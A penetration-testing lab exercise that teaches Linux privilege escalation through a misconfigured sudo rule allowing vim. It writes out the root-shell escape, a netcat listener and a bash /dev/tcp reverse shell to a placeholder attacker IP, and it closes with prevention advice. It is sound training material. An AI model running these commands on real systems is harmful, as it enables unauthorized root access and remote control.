Exercise 1: Privilege Escalation in Linux – Sudo Exploitation

Objective: Understand and exploit the sudo command to gain root privileges on a misconfigured Linux system.

Scenario: You are a penetration tester tasked with evaluating the security of a Linux server. During your assessment, you notice that you have limited user-level access to the system. However, you suspect that improper sudo configurations might allow you to escalate your privileges and gain root access. Your objective is to identify, exploit, and document any vulnerabilities in the sudo configuration to demonstrate privilege escalation.

Lab Setup

1. Environment: Ensure you have a Linux system with a user account that has limited privileges. For this lab, the account should be pre-configured with sudo misconfigurations.
2. Tools Required:
   • Terminal access to the Linux system.
   • A text editor (e.g., vim, nano).
   • Networking tools for reverse shell creation (e.g., netcat, bash).

Lab Steps

Step 1: Identify Sudo Privileges

Log in to the target system with your limited user account.

Run the following command to check the sudo privileges assigned to your user:

sudo -l

Observe the output carefully to identify any binaries or scripts listed that you can run with elevated privileges.

Example output:

User john may run the following commands on target: 
(ALL) NOPASSWD: /usr/bin/vim

Step 2: Analyze the Vulnerability

1. Research the listed binaries or scripts. Certain binaries (e.g., vim, find, awk, etc.) allow you to execute shell commands when run with elevated privileges.
2. In this example, vim can be used to execute arbitrary commands as root.

Step 3: Exploit the Vulnerability

Use the identified vulnerable binary to spawn a root shell:

For vim, execute:

sudo vim -c '!sh' 

This opens a shell with root privileges.

Verify your new privileges:

whoami

If successful, this should return root.

Step 4: Create a Reverse Shell (Optional)

Prepare a listener on your attack machine:

nc -lvnp 4444

On the target machine, use the vulnerable binary to execute a reverse shell:

sudo bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' 

Replace <your_ip> with the IP address of your attack machine.

Once the reverse shell connects, verify your access and privileges.

Step 5: Additional Privilege Escalation Checks

Use the find command to list writable or executable files:

find / -type f -writable 2>/dev/null

Look for files owned by root or critical configuration files.

Attempt privilege escalation using these files if possible.

Testing and Verification

Confirm successful privilege escalation by verifying root access with:

whoami 

id

Document all commands, outputs, and the exploitation process for reporting.

Solution

Explanation:

• The sudo command allows users to execute commands with elevated privileges as defined in the sudoers file. Misconfigurations, such as allowing unrestricted use of powerful binaries (e.g., vim, find), can lead to privilege escalation.
• By leveraging these binaries, you can execute arbitrary commands with root privileges, gaining full control of the system.

Prevention:

1. Restrict sudo access to essential commands only.
2. Regularly audit the sudoers file for misconfigurations.
3. Educate administrators about secure sudo configurations.
4. Implement the principle of least privilege for all users.

Reflection

This exercise highlights the importance of securing sudo configurations to prevent unauthorized privilege escalation. By practicing this lab, you’ve gained valuable insights into identifying and exploiting common misconfigurations, as well as the measures needed to mitigate such risks.